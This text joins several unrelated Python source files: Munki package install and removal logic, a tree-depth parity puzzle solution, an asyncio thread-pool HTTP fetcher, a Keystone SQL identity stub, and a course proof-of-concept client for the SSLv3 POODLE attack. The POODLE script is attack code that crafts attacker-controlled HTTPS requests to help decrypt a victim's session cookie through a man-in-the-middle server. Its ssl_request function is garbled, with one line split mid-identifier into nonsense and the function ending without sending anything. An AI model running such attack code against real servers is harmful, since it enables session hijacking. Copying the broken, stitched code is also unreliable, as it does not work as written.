        # not installed (or outdated): we need to download and install it
        display.display_detail('Need to install %s', manifestitemname)
        iteminfo['installer_item_size'] = item_pl.get(
            'installer_item_size', 0)
        iteminfo['installed_size'] = item_pl.get(
            'installed_size', iteminfo['installer_item_size'])
        try:
            # Get a timestamp, then download the installer item.
            start = datetime.datetime.now()
            # NOTE(review): the 0 default here is odd (compared against a
            # string); it is harmless, but 'None' would read better.
            if item_pl.get('installer_type', 0) == 'nopkg':
                # Packageless install
                download_speed = 0
                filename = 'packageless_install'
            else:
                if download.download_installeritem(item_pl, installinfo):
                    # Record the download speed to the InstallResults output.
                    end = datetime.datetime.now()
                    download_seconds = (end - start).seconds
                    try:
                        if iteminfo['installer_item_size'] < 1024:
                            # ignore downloads under 1 MB or speeds will
                            # be skewed.
                            download_speed = 0
                        else:
                            # installer_item_size is KBytes, so divide
                            # by seconds.
                            download_speed = int(
                                iteminfo['installer_item_size'] /
                                download_seconds)
                    except (TypeError, ValueError, ZeroDivisionError):
                        download_speed = 0
                else:
                    # Item was already in cache; set download_speed to 0.
                    download_speed = 0
                filename = download.get_url_basename(
                    item_pl['installer_item_location'])
            iteminfo['download_kbytes_per_sec'] = download_speed
            if download_speed:
                display.display_detail(
                    '%s downloaded at %d KB/s', filename, download_speed)
            # required keys
            iteminfo['installer_item'] = filename
            iteminfo['installed'] = False
            iteminfo['version_to_install'] = item_pl.get('version', 'UNKNOWN')
            # we will ignore the unattended_install key if the item needs a
            # restart or logout...
            if (item_pl.get('unattended_install') or
                    item_pl.get('forced_install')):
                if item_pl.get('RestartAction', 'None') != 'None':
                    display.display_warning(
                        'Ignoring unattended_install key for %s because '
                        'RestartAction is %s.',
                        item_pl['name'], item_pl.get('RestartAction'))
                else:
                    iteminfo['unattended_install'] = True
            # optional keys copied verbatim from the pkginfo if present
            optional_keys = ['suppress_bundle_relocation',
                             'installer_choices_xml',
                             'installer_environment',
                             'adobe_install_info',
                             'RestartAction',
                             'installer_type',
                             'adobe_package_name',
                             'package_path',
                             'blocking_applications',
                             'installs',
                             'requires',
                             'update_for',
                             'payloads',
                             'preinstall_script',
                             'postinstall_script',
                             'items_to_copy',  # used w/ copy_from_dmg
                             'copy_local',  # used w/ AdobeCS5 Updaters
                             'force_install_after_date',
                             'apple_item',
                             'category',
                             'developer',
                             'icon_name',
                             'PayloadIdentifier',
                             'icon_hash',
                             'OnDemand']
            for key in optional_keys:
                if key in item_pl:
                    iteminfo[key] = item_pl[key]
            if 'apple_item' not in iteminfo:
                # admin did not explicitly mark this item; let's determine if
                # it's from Apple
                if is_apple_item(item_pl):
                    munkilog.log(
                        'Marking %s as apple_item - this will block '
                        'Apple SUS updates' % iteminfo['name'])
                    iteminfo['apple_item'] = True
            installinfo['managed_installs'].append(iteminfo)
            update_list = []
            # (manifestitemname_withoutversion, includedversion) =
            # nameAndVersion(manifestitemname)
            if includedversion:
                # a specific version was specified in the manifest
                # so look only for updates for this specific version
                update_list = catalogs.look_for_updates_for_version(
                    manifestitemname_withoutversion,
                    includedversion, cataloglist)
            else:
                # didn't specify a specific version, so
                # now look for all updates for this item
                update_list = catalogs.look_for_updates(
                    manifestitemname_withoutversion, cataloglist)
                # now append any updates specifically
                # for the version to be installed
                update_list.extend(
                    catalogs.look_for_updates_for_version(
                        manifestitemname_withoutversion,
                        iteminfo['version_to_install'],
                        cataloglist))
            for update_item in update_list:
                # call processInstall recursively so we get the
                # latest version and dependencies
                dummy_result = process_install(
                    update_item, cataloglist, installinfo,
                    is_managed_update=is_managed_update)
            return True
        except fetch.PackageVerificationError:
            display.display_warning(
                'Can\'t install %s because the integrity check failed.',
                manifestitem)
            iteminfo['installed'] = False
            iteminfo['note'] = 'Integrity check failed'
            iteminfo['version_to_install'] = item_pl.get('version', 'UNKNOWN')
            installinfo['managed_installs'].append(iteminfo)
            # un-record the item so a later run can retry it
            if manifestitemname in installinfo['processed_installs']:
                installinfo['processed_installs'].remove(manifestitemname)
            return False
        except (fetch.GurlError, fetch.GurlDownloadError), errmsg:
            display.display_warning(
                'Download of %s failed: %s', manifestitem, errmsg)
            iteminfo['installed'] = False
            iteminfo['note'] = u'Download failed (%s)' % errmsg
            iteminfo['version_to_install'] = item_pl.get('version', 'UNKNOWN')
            installinfo['managed_installs'].append(iteminfo)
            if manifestitemname in installinfo['processed_installs']:
                installinfo['processed_installs'].remove(manifestitemname)
            return False
        except fetch.Error, errmsg:
            display.display_warning(
                'Can\'t install %s because: %s', manifestitemname, errmsg)
            iteminfo['installed'] = False
            iteminfo['note'] = '%s' % errmsg
            iteminfo['version_to_install'] = item_pl.get('version', 'UNKNOWN')
            installinfo['managed_installs'].append(iteminfo)
            if manifestitemname in installinfo['processed_installs']:
                installinfo['processed_installs'].remove(manifestitemname)
            return False
    else:
        # same or newer version is already installed
        iteminfo['installed'] = True
        # record installed size for reporting
        iteminfo['installed_size'] = item_pl.get(
            'installed_size', item_pl.get('installer_item_size', 0))
        if installed_state == 1:
            # just use the version from the pkginfo
            iteminfo['installed_version'] = item_pl['version']
        else:
            # might be newer; attempt to figure out the version
            installed_version = compare.get_installed_version(item_pl)
            if installed_version == "UNKNOWN":
                installed_version = '(newer than %s)' % item_pl['version']
            iteminfo['installed_version'] = installed_version
        installinfo['managed_installs'].append(iteminfo)
        # remove included version number if any
        (name, includedversion) = catalogs.split_name_and_version(
            manifestitemname)
        display.display_detail('%s version %s (or newer) is already installed.',
                               name, item_pl['version'])
        update_list = []
        if not includedversion:
            # no specific version is specified;
            # the item is already installed;
            # now look for updates for this item
            update_list = catalogs.look_for_updates(name, cataloglist)
            # and also any for this specific version
            installed_version = iteminfo['installed_version']
            if not installed_version.startswith('(newer than '):
                update_list.extend(
                    catalogs.look_for_updates_for_version(
                        name, installed_version, cataloglist))
        elif compare.compare_versions(
                includedversion, iteminfo['installed_version']) == 1:
            # manifest specifies a specific version
            # if that's what's installed, look for any updates
            # specific to this version
            update_list = catalogs.look_for_updates_for_version(
                manifestitemname_withoutversion, includedversion, cataloglist)
        # if we have any updates, process them
        for update_item in update_list:
            # call processInstall recursively so we get updates
            # and any dependencies
            dummy_result = process_install(
                update_item, cataloglist, installinfo,
                is_managed_update=is_managed_update)
        return True
def process_manifest_for_key(manifest, manifest_key, installinfo,
                             parentcatalogs=None):
    """Processes keys in manifests to build the lists of items to install and
    remove.

    Can be recursive if manifests include other manifests.
    Probably doesn't handle circular manifest references well.

    manifest can be a path to a manifest file or a dictionary object.

    NOTE(review): on a stop request this returns {} while all other paths
    implicitly return None; callers appear to ignore the return value —
    confirm before normalizing.
    """
    if isinstance(manifest, basestring):
        display.display_debug1(
            "** Processing manifest %s for %s" %
            (os.path.basename(manifest), manifest_key))
        manifestdata = manifestutils.get_manifest_data(manifest)
    else:
        # an embedded manifest dict (e.g. a conditional_items entry)
        manifestdata = manifest
        manifest = 'embedded manifest'
    cataloglist = manifestdata.get('catalogs')
    if cataloglist:
        catalogs.get_catalogs(cataloglist)
    elif parentcatalogs:
        # inherit catalogs from the including manifest
        cataloglist = parentcatalogs
    if not cataloglist:
        display.display_warning('Manifest %s has no catalogs', manifest)
        return
    for item in manifestdata.get('included_manifests', []):
        nestedmanifestpath = manifestutils.get_manifest(item)
        if not nestedmanifestpath:
            raise manifestutils.ManifestException
        if processes.stop_requested():
            return {}
        # recurse into the included manifest, passing our catalogs down
        process_manifest_for_key(nestedmanifestpath, manifest_key,
                                 installinfo, cataloglist)
    conditionalitems = manifestdata.get('conditional_items', [])
    if conditionalitems:
        display.display_debug1(
            '** Processing conditional_items in %s', manifest)
    # conditionalitems should be an array of dicts
    # each dict has a predicate; the rest consists of the
    # same keys as a manifest
    for item in conditionalitems:
        try:
            predicate = item['condition']
        except (AttributeError, KeyError):
            display.display_warning(
                'Missing predicate for conditional_item %s', item)
            continue
        except BaseException:
            display.display_warning(
                'Conditional item is malformed: %s', item)
            continue
        if info.predicate_evaluates_as_true(
                predicate, additional_info={'catalogs': cataloglist}):
            # the conditional item doubles as an embedded manifest
            conditionalmanifest = item
            process_manifest_for_key(
                conditionalmanifest, manifest_key, installinfo, cataloglist)
    for item in manifestdata.get(manifest_key, []):
        if processes.stop_requested():
            return {}
        # dispatch on the manifest key being processed
        if manifest_key == 'managed_installs':
            dummy_result = process_install(item, cataloglist, installinfo)
        elif manifest_key == 'managed_updates':
            process_managed_update(item, cataloglist, installinfo)
        elif manifest_key == 'optional_installs':
            process_optional_install(item, cataloglist, installinfo)
        elif manifest_key == 'managed_uninstalls':
            dummy_result = process_removal(item, cataloglist, installinfo)
def process_removal(manifestitem, cataloglist, installinfo):
    """Processes a manifest item; attempts to determine if it
    needs to be removed, and if it can be removed.

    Unlike installs, removals aren't really version-specific -
    If we can figure out how to remove the currently installed
    version, we do, unless the admin specifies a specific version
    number in the manifest. In that case, we only attempt a
    removal if the version installed matches the specific version
    in the manifest.

    Any items dependent on the given item need to be removed first.
    Items to be removed are added to installinfo['removals'].

    Calls itself recursively as it processes dependencies.
    Returns a boolean; when processing dependencies, a false return
    will stop the removal of a dependent item.
    """
    def get_receipts_to_remove(item):
        """Returns a list of receipts to remove for item"""
        name = item['name']
        pkgdata = catalogs.analyze_installed_pkgs()
        if name in pkgdata['receipts_for_name']:
            return pkgdata['receipts_for_name'][name]
        return []

    manifestitemname_withversion = os.path.split(manifestitem)[1]
    display.display_debug1(
        '* Processing manifest item %s for removal' %
        manifestitemname_withversion)
    (manifestitemname, includedversion) = catalogs.split_name_and_version(
        manifestitemname_withversion)
    # have we processed this already?
    if manifestitemname in [catalogs.split_name_and_version(item)[0]
                            for item in installinfo['processed_installs']]:
        display.display_warning(
            'Will not attempt to remove %s because some version of it is in '
            'the list of managed installs, or it is required by another'
            ' managed install.', manifestitemname)
        return False
    elif manifestitemname in installinfo['processed_uninstalls']:
        display.display_debug1(
            '%s has already been processed for removal.', manifestitemname)
        return True
    else:
        installinfo['processed_uninstalls'].append(manifestitemname)
    infoitems = []
    if includedversion:
        # a specific version was specified
        item_pl = catalogs.get_item_detail(
            manifestitemname, cataloglist, includedversion)
        if item_pl:
            infoitems.append(item_pl)
    else:
        # get all items matching the name provided
        infoitems = catalogs.get_all_items_with_name(
            manifestitemname, cataloglist)
    if not infoitems:
        display.display_warning(
            'Could not process item %s for removal. No pkginfo found in '
            'catalogs: %s ', manifestitemname, ', '.join(cataloglist))
        return False
    install_evidence = False
    for item in infoitems:
        display.display_debug2('Considering item %s-%s for removal info',
                               item['name'], item['version'])
        if installationstate.evidence_this_is_installed(item):
            install_evidence = True
            # NOTE: the loop variable 'item' is deliberately reused below
            # after this break — it holds the pkginfo we found evidence for.
            break
        else:
            display.display_debug2(
                '%s-%s not installed.', item['name'], item['version'])
    if not install_evidence:
        display.display_detail(
            '%s doesn\'t appear to be installed.', manifestitemname_withversion)
        iteminfo = {}
        iteminfo['name'] = manifestitemname
        iteminfo['installed'] = False
        installinfo['removals'].append(iteminfo)
        return True
    # if we get here, install_evidence is true, and item
    # holds the item we found install evidence for, so we
    # should use that item to do the removal
    uninstall_item = None
    packages_to_remove = []
    # check for uninstall info
    # and grab the first uninstall method we find.
    if item.get('uninstallable') and 'uninstall_method' in item:
        uninstallmethod = item['uninstall_method']
        if uninstallmethod == 'removepackages':
            packages_to_remove = get_receipts_to_remove(item)
            if packages_to_remove:
                uninstall_item = item
        elif uninstallmethod.startswith('Adobe'):
            # Adobe CS3/CS4/CS5/CS6/CC product
            uninstall_item = item
        elif uninstallmethod in ['remove_copied_items',
                                 'remove_app',
                                 'uninstall_script',
                                 'remove_profile']:
            uninstall_item = item
        else:
            # uninstall_method is a local script.
            # Check to see if it exists and is executable
            if os.path.exists(uninstallmethod) and \
               os.access(uninstallmethod, os.X_OK):
                uninstall_item = item
    if not uninstall_item:
        # the uninstall info for the item couldn't be matched
        # to what's on disk
        display.display_warning('Could not find uninstall info for %s.',
                                manifestitemname_withversion)
        return False
    # if we got this far, we have enough info to attempt an uninstall.
    # the pkginfo is in uninstall_item
    # Now check for dependent items
    #
    # First, look through catalogs for items that are required by this item;
    # if any are installed, we need to remove them as well
    #
    # still not sure how to handle references to specific versions --
    # if another package says it requires SomePackage--1.0.0.0.0
    # and we're supposed to remove SomePackage--1.0.1.0.0... what do we do?
    #
    dependentitemsremoved = True
    uninstall_item_name = uninstall_item.get('name')
    uninstall_name_w_version = (
        '%s-%s' % (uninstall_item.get('name'), uninstall_item.get('version')))
    alt_uninstall_name_w_version = (
        '%s--%s' % (uninstall_item.get('name'), uninstall_item.get('version')))
    processednames = []
    for catalogname in cataloglist:
        if not catalogname in catalogs.catalogs():
            # in case the list refers to a non-existent catalog
            continue
        for item_pl in catalogs.catalogs()[catalogname]['items']:
            name = item_pl.get('name')
            if name not in processednames:
                if 'requires' in item_pl:
                    # does this catalog item require the item we are removing?
                    if (uninstall_item_name in item_pl['requires'] or
                            uninstall_name_w_version
                            in item_pl['requires'] or
                            alt_uninstall_name_w_version
                            in item_pl['requires']):
                        display.display_debug1(
                            '%s requires %s, checking to see if it\'s '
                            'installed...', item_pl.get('name'),
                            manifestitemname)
                        if installationstate.evidence_this_is_installed(
                                item_pl):
                            display.display_detail(
                                '%s requires %s. %s must be removed as well.',
                                item_pl.get('name'), manifestitemname,
                                item_pl.get('name'))
                            success = process_removal(
                                item_pl.get('name'), cataloglist, installinfo)
                            if not success:
                                dependentitemsremoved = False
                                # NOTE(review): this break only exits the
                                # inner loop; the outer catalog loop keeps
                                # scanning — confirm that is intended.
                                break
                # record this name so we don't process it again
                processednames.append(name)
    if not dependentitemsremoved:
        display.display_warning('Will not attempt to remove %s because could '
                                'not remove all items dependent on it.',
                                manifestitemname_withversion)
        return False
    # Finally! We can record the removal information!
    iteminfo = {}
    iteminfo['name'] = uninstall_item.get('name', '')
    iteminfo['display_name'] = uninstall_item.get('display_name', '')
    iteminfo['description'] = 'Will be removed.'
    # we will ignore the unattended_uninstall key if the item needs a restart
    # or logout...
    if (uninstall_item.get('unattended_uninstall') or
            uninstall_item.get('forced_uninstall')):
        if uninstall_item.get('RestartAction', 'None') != 'None':
            display.display_warning(
                'Ignoring unattended_uninstall key for %s '
                'because RestartAction is %s.',
                uninstall_item['name'],
                uninstall_item.get('RestartAction'))
        else:
            iteminfo['unattended_uninstall'] = True
    # some keys we'll copy if they exist
    optional_keys = ['blocking_applications',
                     'installs',
                     'requires',
                     'update_for',
                     'payloads',
                     'preuninstall_script',
                     'postuninstall_script',
                     'apple_item',
                     'category',
                     'developer',
                     'icon_name',
                     'PayloadIdentifier']
    for key in optional_keys:
        if key in uninstall_item:
            iteminfo[key] = uninstall_item[key]
    if 'apple_item' not in iteminfo:
        # admin did not explicitly mark this item; let's determine if
        # it's from Apple
        # NOTE(review): item_pl here is the leftover loop variable from the
        # catalog scan above, NOT uninstall_item — looks like it should be
        # is_apple_item(uninstall_item); confirm upstream before changing.
        if is_apple_item(item_pl):
            iteminfo['apple_item'] = True
    if packages_to_remove:
        # remove references for each package
        packages_to_really_remove = []
        for pkg in packages_to_remove:
            display.display_debug1('Considering %s for removal...', pkg)
            # find pkg in pkgdata['pkg_references'] and remove the reference
            # so we only remove packages if we're the last reference to it
            pkgdata = catalogs.analyze_installed_pkgs()
            if pkg in pkgdata['pkg_references']:
                display.display_debug1('%s references are: %s', pkg,
                                       pkgdata['pkg_references'][pkg])
                if iteminfo['name'] in pkgdata['pkg_references'][pkg]:
                    pkgdata['pkg_references'][pkg].remove(iteminfo['name'])
                    if len(pkgdata['pkg_references'][pkg]) == 0:
                        display.display_debug1(
                            'Adding %s to removal list.', pkg)
                        packages_to_really_remove.append(pkg)
            else:
                # This shouldn't happen
                display.display_warning(
                    'pkg id %s missing from pkgdata', pkg)
        if packages_to_really_remove:
            iteminfo['packages'] = packages_to_really_remove
        else:
            # no packages that belong to this item only.
            display.display_warning('could not find unique packages to remove '
                                    'for %s', iteminfo['name'])
            return False
    iteminfo['uninstall_method'] = uninstallmethod
    if uninstallmethod.startswith('Adobe'):
        if (uninstallmethod == "AdobeCS5AAMEEPackage" and
                'adobe_install_info' in item):
            iteminfo['adobe_install_info'] = item['adobe_install_info']
        else:
            if 'uninstaller_item_location' in item:
                location = uninstall_item['uninstaller_item_location']
            else:
                location = uninstall_item['installer_item_location']
            try:
                # Adobe uninstalls need the (un)installer item on disk
                download.download_installeritem(
                    item, installinfo, uninstalling=True)
                filename = os.path.split(location)[1]
                iteminfo['uninstaller_item'] = filename
                iteminfo['adobe_package_name'] = uninstall_item.get(
                    'adobe_package_name', '')
            except fetch.PackageVerificationError:
                display.display_warning(
                    'Can\'t uninstall %s because the integrity check '
                    'failed.', iteminfo['name'])
                return False
            except fetch.Error, errmsg:
                display.display_warning(
                    'Failed to download the uninstaller for %s because %s',
                    iteminfo['name'], errmsg)
                return False
    elif uninstallmethod == 'remove_copied_items':
        iteminfo['items_to_remove'] = item.get('items_to_copy', [])
    elif uninstallmethod == 'remove_app':
        if uninstall_item.get('installs', None):
            iteminfo['remove_app_info'] = uninstall_item['installs'][0]
    elif uninstallmethod == 'uninstall_script':
        iteminfo['uninstall_script'] = item.get('uninstall_script', '')
    # before we add this removal to the list,
    # check for installed updates and add them to the
    # removal list as well:
    update_list = catalogs.look_for_updates(uninstall_item_name, cataloglist)
    update_list.extend(catalogs.look_for_updates(
        uninstall_name_w_version, cataloglist))
    update_list.extend(catalogs.look_for_updates(
        alt_uninstall_name_w_version, cataloglist))
    for update_item in update_list:
        # call us recursively...
        dummy_result = process_removal(update_item, cataloglist, installinfo)
    # finish recording info for this removal
    iteminfo['installed'] = True
    iteminfo['installed_version'] = uninstall_item.get('version')
    if 'RestartAction' in uninstall_item:
        iteminfo['RestartAction'] = uninstall_item['RestartAction']
    installinfo['removals'].append(iteminfo)
    display.display_detail(
        'Removal of %s added to ManagedInstaller tasks.',
        manifestitemname_withversion)
    return True
# This module is a library; running it directly only prints a notice.
if __name__ == '__main__':
    print 'This is a library of support tools for the Munki Suite.'
|
# Module imports
import sys
# The recursive DFS below can exceed the default recursion limit on
# deep trees, so raise it substantially.
sys.setrecursionlimit(1000000)
# Read standard input: N towns, Q queries, then N-1 bidirectional roads.
N, Q = list(map(int, input().split()))
g = {i: [] for i in range(1, N + 1)}  # adjacency list, nodes 1..N
for _ in range(N - 1):
    a, b = list(map(int, input().split()))
    g[a].append(b)
    g[b].append(a)
q = []  # the (c, d) query pairs, answered after the depths are known
for _ in range(Q):
    c, d = list(map(int, input().split()))
    q.append((c, d))
# Solve: t[node] will hold each node's depth from node 1 (-1 = unvisited)
t = {i: -1 for i in range(1, N + 1)}
def dfs(g: dict, t: dict, depth: int, node: int) -> None:
    """Fill ``t`` with the depth of every node reachable from ``node``.

    Iterative depth-first traversal: an explicit stack replaces recursion,
    which could overflow the interpreter stack on deep (path-like) trees
    even with a raised recursion limit.  A node whose ``t`` entry is not
    -1 has already been visited and is skipped, exactly as in the
    recursive version.

    Parameters:
        g: adjacency list {node: [neighbors]}
        t: depth table {node: depth or -1}, mutated in place
        depth: depth assigned to the starting node
        node: starting node
    """
    stack = [(node, depth)]
    while stack:
        cur, d = stack.pop()
        if t[cur] != -1:
            continue
        t[cur] = d
        for nxt in g[cur]:
            if t[nxt] == -1:
                stack.append((nxt, d + 1))
dfs(g, t, 0, 1)
# Answer each query: two towns whose depths have equal parity are an even
# number of edges apart, so the two walkers meet at a town; otherwise they
# meet in the middle of a road.
for c, d in q:
    if abs(t[c] - t[d]) % 2 == 0:
        print("Town")
    else:
        print("Road")
|
# ================================================================================
#
# httpsRequest.py
#
# This is the https client request program written for my proof of concept program
# to demonstrate the SSLv3 Padding Oracle On Downgraded Legacy Encryption.
# (POODLE) attack.
#
# Written in Python 2.7.7, requires ssl, socket, sys, select, os, multiprocessing, Queue
# Should work for any 2.x python
#
# Authors: Ryan Grandgenett
# For: IASC 8410-001
# Date: March 2015
#
# ================================================================================
# Imports
import ssl
import socket
import sys
import select
import os
import multiprocessing
import Queue
from optparse import OptionParser
#
# Builds https request used by the Man-in-the-Middle server program. The idea is an attacker
# needs a way to control the data before and after the target blocks (session cookie) in order
# to use the Poodle exploit. To accomplish this requirement an attacker may use a HTTPS post request
# because this would allow the attacker to control the url and post data portion of the post request.
#
def build_request(hostname, urlData, postData):
    """Return an HTTP/1.0 POST request string for the target server.

    The attacker controls both the URL (``urlData``) and the POST body
    (``postData``) so the session cookie can be aligned on a block
    boundary for the POODLE attack.
    """
    body = 'data=' + postData
    header_lines = [
        'POST %s HTTP/1.0' % urlData,
        'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*',
        'Accept-Language: en-us',
        'Content-Type: application/x-www-form-urlencoded',
        'Connection: Keep-Alive',
        'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
        'Host: %s' % hostname,
        'Content-Length: %d' % len(body),
        'Cache-Control: no-cache',
        'Cookie: PHPSESSID=566tkbpdjdbcrcism2bfthhmt4',
    ]
    return '\r\n'.join(header_lines) + '\r\n\r\n' + body
#
# Sends the SSL request to the remote web server, the https request is sent using SSLv3
#
def ssl_request(hostname, port, cipher, request):
    """Open an SSLv3 connection to hostname:port and send *request*.

    NOTE(review): ssl.PROTOCOL_SSLv3 / ssl.wrap_socket only exist on old
    Python 2 / OpenSSL builds (SSLv3 support has since been removed), so
    this function cannot run on modern interpreters.
    """
    # Connect to remote web server; retries forever until the TCP
    # connection succeeds (bare except swallows all connect errors).
    while 1:
        try:
            ssl_socket = socket.create_connection((hostname, port))
            break
        except:
            print "[-] Error connecting to remote web server %s. Trying again!" % (hostname)
    # Allow socket.SO_REUSEADDR
    ssl_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSE
ADDR, 1) if False else ssl_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
#
# Function that is executed by the start exploit process. The job of this process is to
# wait until the exploit worker process is ready to start the POOODLE exploit, then fire
# off the first https request.
#
def StartExploit(q, hostname, port, cipher, message_url_data, message_post_data):
    """Wait for the exploit worker to signal readiness, then fire the first
    https request so the MiM server can begin the POODLE decryption loop.
    Exits the process on queue timeout or bad queue data.
    """
    try:
        # Wait for the exploit worker process to signal it is ready to start the
        # POODLE exploit
        result = q.get(timeout=300)
        # The exploit worker process is ready to start the POODLE exploit
        if result == True:
            # Send the first https request to get the MiM server started
            urlData = message_url_data
            postData = message_post_data
            payload = build_request(hostname, urlData, postData)
            ssl_request(hostname, port, cipher, payload)
        # Else there was an error putting data in the queue
        else:
            print "[-] Error bad data found in queue."
            os._exit(1)
    except Queue.Empty:
        print "[-] Error failed to get data from the queue."
        os._exit(1)
#
# Function that is executed by the exploit worker process. The job of this process is to
# create and send a properly formatted https request using the data it receives from the MiM server.
#
def ExploitWorker(q, listen_port, hostname, port, cipher):
    """Listen for a connection from the MiM server, then loop: receive
    'urlData$postData' payloads, rebuild the https request, and replay it
    to the target server over SSLv3 until the MiM server sends 'quit'.
    """
    HOST = '0.0.0.0' # Listening on all interfaces
    PORT = listen_port # Port to listen on
    urlData = '' # Variable to save url data from MiM server
    postData = '' # Variable to save post data from MiM server
    # Set the number of backlogged connections the https request program will handle
    backlog = 1
    # Set the number of bytes the https request program will receive from the socket
    size = 1024
    # Create the socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Allow socket.SO_REUSEADDR
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    # Bind the socket to the port
    s.bind((HOST, PORT))
    # Listen for connections
    s.listen(backlog)
    # Wait for incoming connections
    server, address = s.accept()
    # Set the server to non-blocking
    server.setblocking(0)
    # Let the start exploit process know that the https request program has connected
    # to the MiM server and is ready to start the exploit
    try:
        q.put(True,timeout=300)
    except Queue.Full:
        print "[-] Error failed to write data to queue"
        os._exit(1)
    # Infinite loop used to get request data from the MiM server
    try:
        while 1:
            # Verify socket is ready to read data (5 minute timeout)
            ready = select.select([server], [], [], 300)
            # If socket has data to read
            if ready[0]:
                # Read in data from server
                data = server.recv(size)
                # If MiM server is done decrypting blocks, then quit the program
                if data == 'quit\n':
                    server.close()
                    sys.exit(1)
                # Else get the url and post data from the MiM server and make a new https request
                else:
                    # Strip off the newline
                    payload = (data.rstrip('\n'))
                    # Get the url data ('$' separates the two fields)
                    urlData = payload.split('$')[0]
                    # Get the post data
                    postData = payload.split('$')[1]
                    # Create the https post request
                    request = build_request(hostname, urlData, postData)
                    # Send the https post request to the web server
                    ssl_request(hostname, port, cipher, request)
    except KeyboardInterrupt:
        print "Exiting..."
        os._exit(1)
#
# Program main function called on program start
#
def main():
    """Parse command-line options, then run the start-exploit and
    exploit-worker processes and wait for both to finish.
    """
    # Parse the command line arguments
    parser = OptionParser(epilog="Report bugs to rmgrandgenett@unomaha.edu", description="HTTPS client request program used to demonstrate the SSLv3 Padding Oracle On Downgraded Legacy Encryption (POODLE) attack.", version="0.1")
    parser.add_option('-l', help='port for https request program to listen for connection from MiM server', action='store', dest='listen_port')
    parser.add_option('-n', help='hostname of web server(ex. poodle.unonullify.com)', action='store', dest='hostname')
    parser.add_option('-p', help='https port of web server(ex. 443)', action='store', dest='port')
    parser.add_option('-c', help='SSL cipher string to use(ex. DH+3DES)', action='store', dest='cipher')
    parser.add_option('-u', help='initial url data value (must match server MiM server)', action='store', dest='message_url_data')
    parser.add_option('-d', help='initial post request data value (must match server MiM server)', action='store', dest='message_post_data')
    # Verify the required command line arguments are present
    (options, args) = parser.parse_args(sys.argv)
    if not options.listen_port or not options.hostname or not options.port or not options.cipher or not options.message_post_data or not options.message_url_data:
        print '\n[-] -l, -n, -p, -c, -u, and -d are required. Please use the -h flag for help.'
        sys.exit(1)
    # Start the start exploit and exploit worker processes
    try:
        # Queue used to signal when the ExploitWorker process is ready to begin exploit
        q = multiprocessing.Queue()
        # Start exploit process
        start_exploit = multiprocessing.Process(target=StartExploit, args=(q,str(options.hostname),int(options.port), str(options.cipher), str(options.message_url_data),str(options.message_post_data)))
        # Exploit worker processes
        exploit_worker = multiprocessing.Process(target=ExploitWorker, args=(q,int(options.listen_port),str(options.hostname),str(options.port), str(options.cipher)))
        # Start the exploit start process
        start_exploit.start()
        # Start the exploit worker process
        exploit_worker.start()
        # Wait for start exploit process to return
        start_exploit.join()
        # Wait for exploit worker process to return
        exploit_worker.join()
    except KeyboardInterrupt:
        print "Exiting..."
        os._exit(1)
# Hook
if __name__ == '__main__':
main() |
# 使用多线程: 在协程中集成阻塞io
import asyncio
import socket
import time
from concurrent.futures.thread import ThreadPoolExecutor
from urllib.parse import urlparse
def get_url(url):
    """Fetch *url* over a blocking socket and return the HTTP response body.

    Sends a minimal HTTP/1.1 GET with ``Connection: close`` so ``recv()``
    eventually sees EOF, then splits headers from body at the first blank
    line.  Intended to be run inside a thread-pool executor so the blocking
    I/O can be integrated with a coroutine loop.
    """
    parsed = urlparse(url)
    path = parsed.path or "/"
    # BUG FIX: netloc may contain an explicit ':port' suffix, which would
    # break connect(); .hostname strips it and .port exposes it (default 80).
    host = parsed.hostname
    port = parsed.port or 80
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((host, port))
    # Fixed-format HTTP request; Connection: close terminates the stream.
    client.send("GET {} HTTP/1.1\r\nHost:{}\r\nConnection:close\r\n\r\n".format(path, host).encode("utf8"))
    data = b""
    while True:
        chunk = client.recv(1024)
        if chunk:
            data += chunk
        else:
            break
    client.close()
    # Body is everything after the first blank line separating the headers.
    body = data.decode("utf-8").split("\r\n\r\n")[1]
    print(body)
    return body
if __name__ == '__main__':
    start_time = time.time()
    loop = asyncio.get_event_loop()
    # Create a thread pool; a max-worker count could be passed to bound it.
    executor = ThreadPoolExecutor()
    # loop.run_in_executor(executor, func_name, func_args)
    # loop.run_in_executor(executor, get_url, "http://www.imooc.com")
    tasks = []
    for i in range(2, 20):
        url = "http://shop.projectsedu.com/goods/{}/".format(i)
        # loop.run_in_executor(executor, func, *args) returns a future/task
        # object that can be awaited by the event loop.
        task = loop.run_in_executor(executor, get_url, url)
        tasks.append(task)
    loop.run_until_complete(asyncio.wait(tasks))
    print("last time :{}".format(time.time()-start_time))
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import functools
from keystone import clean
from keystone.common import sql
from keystone.common.sql import migration
from keystone.common import utils
from keystone import exception
from keystone import identity
def _filter_user(user_ref):
    """Return *user_ref* with any 'password' entry removed (in place)."""
    if not user_ref:
        return user_ref
    user_ref.pop('password', None)
    return user_ref
def _ensure_hashed_password(user_ref):
    """Hash the 'password' entry of *user_ref* in place, if one is set."""
    raw = user_ref.get('password', None)
    if raw is not None:
        user_ref['password'] = utils.hash_password(raw)
    return user_ref
def handle_conflicts(type='object'):
    """Converts IntegrityError into HTTP 409 Conflict.

    Decorator factory: wraps a method so that database uniqueness
    violations surface as exception.Conflict with the given *type* label.
    """
    def decorator(method):
        @functools.wraps(method)
        def wrapper(*args, **kwargs):
            try:
                return method(*args, **kwargs)
            except sql.IntegrityError as e:
                # NOTE(review): e.message is a Python 2 idiom (gone in
                # Python 3); switch to str(e) if this module is ported.
                raise exception.Conflict(type=type, details=e.message)
        return wrapper
    return decorator
class User(sql.ModelBase, sql.DictBase):
    """SQL model for a user; non-indexed attributes live in the ``extra`` blob."""
    __tablename__ = 'user'
